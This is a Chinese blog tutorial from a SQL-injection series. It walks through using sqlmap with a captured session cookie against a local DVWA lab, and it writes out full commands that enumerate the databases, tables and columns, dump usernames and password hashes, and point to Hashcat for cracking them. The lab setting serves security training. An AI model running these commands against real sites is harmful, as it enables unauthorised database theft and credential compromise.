SQL注入——SQLmap的进阶使用(十四)

已于 2022-03-03 15:18:39 修改
阅读量876 收藏 5
点赞数 2
分类专栏: SQL注入 文章标签: sql web安全 安全 数据库 经验分享
于 2022-02-21 20:47:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Gjqhs/article/details/123050900
版权

实验目的
普及SQLMAP的常用命令及SQLMAP的--cookie参数的使用方法。PS:面试时不要说打靶场什么东西,就说什么编码之类的

实验环境
攻击机:银鞍照白马
(1)操作系统:Windows10
(2)安装的应用软件:sqlmapBurpsuiteireFox浏览器插件HackbarF
FoxyProxy等
(3)登录账号密码:操作系统帐号Admin,密码asdfghjkl
靶机:药罐子

(1)操作系统:本机(建议用虚拟机,特别是Linux)不过我太懒了[]~( ̄▽ ̄)~*
(2)安装的应用软件:Apache、MySQL(MariaDB)、PHP:DVWA、SQLi-Labs、
Webug3.0漏洞网站环境
(3)登录账号密码:操作系统帐号root,密码qwertyuio

实验原理

Cookie,指某些网站为了辨别用户身份而储存在用户本地终端上的数据。Cookie在Web应用中至关重要,用户的唯一标识sessionid也是存在cookie中的。利用SQLMAP对目标网站进行检测时,默认是不带cookie的,在一些情况下发出去的请求可能会被服务器拒之门外。这时,我们需要带上cookie才能进行SQL注入检测

实验步骤

本实验的目标是:以DVWA网站为入口,利用SQLMAP实施自动化SQL注入,获取DVWA网站的全部登录用户名和密码

1.访问SQLi-Labs网站

1.访间DVWA网站
(1)在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的 DVWA网站。访间的URL为:

http://靶机ip/dvwa-master

输入默认用户名admin、密码password登录:

 (2)成功登录DVWA网站后,在左侧菜单点击 DVWA Security,将DVWA网站的安全级别设置为 Low,并点击Submit按钮。

(3)安全级别设置完成后,在左侧莱单点击“SQLIrjection”模块,进入SQL注入训练模块;

2.利用Burpsuite工具抓包(不会抓包点链接,以此类推)

随便提交点什么,然后抓包

 抓包成功在Burpsuite界面将此HTTP请求包中的cookie字段拷贝下来,作为下一步为 SQLMAP的  --cookie参数赋值

3.启动SQLMAP

4.寻找注入点
使用以下命令自动寻找网站的注入点,并获取网站及后台数据库的基本信息

python sqlmap.py -u http://靶机IP/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit --cookie 刚才拷贝内容

python sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=impossible; PHPSESSID=vm0iv7kml96mb1ipdla3emchl4"

这种就是保护等级过高提示

 检测结果

注意:利用SQLMAP对目标网站进行检测时,默认是不带cookie的,在本例中会出现网站重定向的问题而导致检测失败。为避免此问题,需要带上cookie字段才能进行SQL注入检测。

5.获取所有可用的数据库的库名
(1)使用以下命令获取所有可用的数据库的库名:

python sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=vm0iv7kml96mb1ipdla3emchl4" --dbs

(2)使用以下命令获取网站当前所在数据库的库名:

python sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=vm0iv7kml96mb1ipdla3emchl4" --current-db

检测结果:网站当前所在数据库的库名为dvwa

6.获取dvwa数据库中所有的表名
使用以下命令获取dvwa数据库中所有的表名:

python sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=vm0iv7kml96mb1ipdla3emchl4" -D dvwa --tables

检测结果:dwwa数据库中含有guestbook和users两张表。

其中,users表当中可能存放着网站用户的基本信息。
7.获取users表的全部字段名
使用以下命令获取users表的全部字段名:

python sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=vm0iv7kml96mb1ipdla3emchl4" -D dvwa -T users --columns

检测结果:users表中有八个字段user、avatar、failed_login、first_name、last_login、last_name、password 和user_id

8.获取users表中user和password字段的全部值使用以下命令获取users表中user和password字段的全部值:

python sqlmap.py -u "http://127.0.0.1/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=vm0iv7kml96mb1ipdla3emchl4" -D dvwa -T users -C user,password --dump

资料到手:

 后续可根据实际需要,使用Kali系统自带的Hashcat工具对密码Hash值进行破解,此处不再赘述!

SQL注入 ——sql数据库操作基础(一)_Gjqhs的博客-CSDN博客

SQL注入——基于报错的注入(五)_Gjqhs的博客-CSDN博客

 SQL注入——SQLmap的进阶使用(十三)_Gjqhs的博客-CSDN博客

 ...

更多包括而不限于SQL注入的文章,关注我全部带走吧( •̀ ω •́ )✧

告诉桃花不用开了
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLMAP高级用法
你在看屏幕的同时,屏幕也在注视着你
12-19 2152
sqlmap高级用法
sqlmap注入使用教程
热门推荐
黑面狐
09-05 8万+
最近在学习SQL注入的东西。自己搭建了一个wavsep靶机,作为练习的对象,之后有空会写一个wavsep的教程。 首先下载安装sqlmap..github传送门:https://github.com/sqlmapproject/sqlmap/releases 一、sqlmap选项   目标:至少要选中一个参数     -u URL, --url=URL   目标为 URL (例如. "ht
最新黑客工具之sqlmap安装教程,超详细使用教程(附工具安装包)(1),2024年最新腾讯T2亲自教你
2401_84281601的博客
05-14 890
这些选项可以用来创建用户自定义函数​​​​​​​--udf-inject 注入用户自定义函数--shared-lib=SHLIB 共享库的本地路径。
sqlmap注入
路~可以走过
06-05 641
文章目录1.概述用VirtualBox搭建kali2.更多渗透测试文章参考3.概述用VMware Workstation搭建DVWA4.拓扑图的展示5.设置DVWA的安全等级6.提交DVWA的注入点,进行渗透测试7.使用sqlmap检索DVWA数据库和用户8.使用salmap枚举用户和用户密码9.使用sqlmap枚举用户所有的数据库名称10.使用sqlmap枚举DVWA的数据表11.使用sqlmap枚举数据表中的字段12.拖库 1.概述用VirtualBox搭建kali 1-1.点击设置 1-2.
sqlmap简单注入
weixin_48103302的博客
08-25 314
一、sqlmap选项 目标:至少要选中一个参数 -u URL, --url=URL 目标为 URL (例如. “http://www.site.com/vuln.php?id=1”) -g GOOGLEDORK 将谷歌dork的结果作为目标url 请求: 这些选项可用于指定如何连接到目标URL –data=DATA 数据字符串通过POST发送 –cookie=COOKIE HTTP Cookie的值 –random-agent 随机选择 HTTP User-
SQLMAP深入分析-使用篇(基础使用进阶命令、tamper脚本)
Love&Share
12-29 2万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
详解强大的SQL注入工具——SQLMAP
05-09
这是一个审计数据库安全SQL注入工具的使用指南, 该工具在windows平台与linux平台下均可以使用数据库管理员(DBA)可用它来检 验自己的数据库是否存在安全配置方面的漏洞。
SQL注入使用brupSuite辅助注入、sqlmap使用
最新发布
05-30
SQL注入使用brupSuite辅助注入、sqlmap使用
网络安全 sql注入工具sqlmap使用
01-13
网络安全sql注入工具sqlmap使用 Sqlmap是当前最流行的sql注入工具之一,广泛应用于网络安全领域,特别是在渗透测试和漏洞扫描领域。Sqlmap可以自动检测和利用SQL注入漏洞,获取数据库敏感信息,包括数据库结构、...
sql注入工具sqlmap源代码+常用指令
04-09
SQLMap是一款流行的开源SQL注入工具,用于自动化检测和利用Web应用程序中的SQL注入漏洞。它可以测试目标站点是否存在SQL注入漏洞,并探测数据库类型、操作系统、表名、列名等信息,进而将这些信息自动化地利用来获取...
sqlmap sql 注入测试工具
03-06
sqlmap 可以很方便的测试sql 注入 安装后直接使用
Sqlmap简单使用详解
Zlirving_的博客
05-29 958
Sqlmap概述 Sqlap是一个开源的、自动化的SQL注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过tamper脚本,功能非常强大 (当然在检测漏洞的时候最好就是手工配合工具) 工作原理 它的工作原理和手工注入的原理是一样的:检测动态页面中get/post参数、cookie、 http头,并爆出数据。 不需要我们再手动写payload,因为它有非常强大的引擎,各种各样的参数、各种各样的位置,它都可以去完成SQL注入漏洞的检测、利用、以及数据的提取。 Win安装 这个sq
测试工具-sqlmap
weixin_42902126的博客
06-27 4242
sqlmap支持直连,通过以下命令来直连。 1、服务型数据库:mysql,oracle,sqlserver,postgresql等 服务型数据库(前提知道数据库用户名和密码): mysql数据库root账户默认不支持外链,参考文档:https://qa.1r1g.com/sf/ask/3435601921/ 2、文件型数据库sqlite,access,firebird等 文件型数据库(前提知道数据库绝对路径): sqlmap获取目标 单一url探测 参数使用 -u 或 --url URL格式:http(s
sqlmap工具使用
qq_39416206的博客
03-08 3330
一、打开方式 1.首先找到sqlmap的文件夹点进去之后,在图标位置输入cmd三个见键盘字母 2.然后就进入这样的页面 3.我们可以在这里输入 python sqlmap.py 查看一下是否正常
SQLMAP简介及使用方式
weixin_61862241的博客
05-06 9076
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQLSQL Server、Access、IBM DB2、SQLite等数据库;基于布尔类型的注入,即可根据返回页面判断条件真假的注入;基于时间的盲注,即不能根据页面返回判断的时候,利用时间线是否延时来判断条件的真假;
sqlmap工具学习记
m0_70483044的博客
07-20 602
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。Sqlmap的强大的功能包括 数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时执行任意命令。是sql注入方面一个强大的工具!...
SQLMAP工具 详细使用方法
HAKUNAMATATATTA的博客
11-15 3303
SQLMAP 是一个开源的渗透测试工具,可以用来自动化的检测,利用 SQL 注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令
sqlmap sqlmap.py 功能简介
stock_tt的专栏
05-23 1399
sqlmap.py 功能简介。 非常好的数据库工具。ACCESS 不行。其他的非常好用。下面介绍一下主要功能。 如果你知道数据库地址,用户名,可以直接连接。 sqlmap.py  -d  这个目前我感觉优势不大。最主要的是下面的功能。注入查询,和shell .注入:     支持一下几种注入。 盲注。  time based blind ,e
dvwa无法修改更改等级问题
欢迎来到我的博客
03-22 522
使用burp时出现两个等级 cookie="security=impossible; security=low… 原因:在多个浏览器登录了burp 解决:退出所有登录账号,删除浏览器缓存,重新登录,修改等级(需要等一段时间才能生效) 转载:https://blog.csdn.net/qq_34626094/article/details/113129346 ...
sqlmap使用教程sql注入
08-17
sqlmap是一种用于检测和利用SQL注入漏洞的工具,它可以帮助安全测试人员或研究人员识别并利用存在于Web应用程序中的SQL注入漏洞。然而,使用sqlmap进行未经授权的测试是非法的,并且可能导致法律后果。如果您对SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值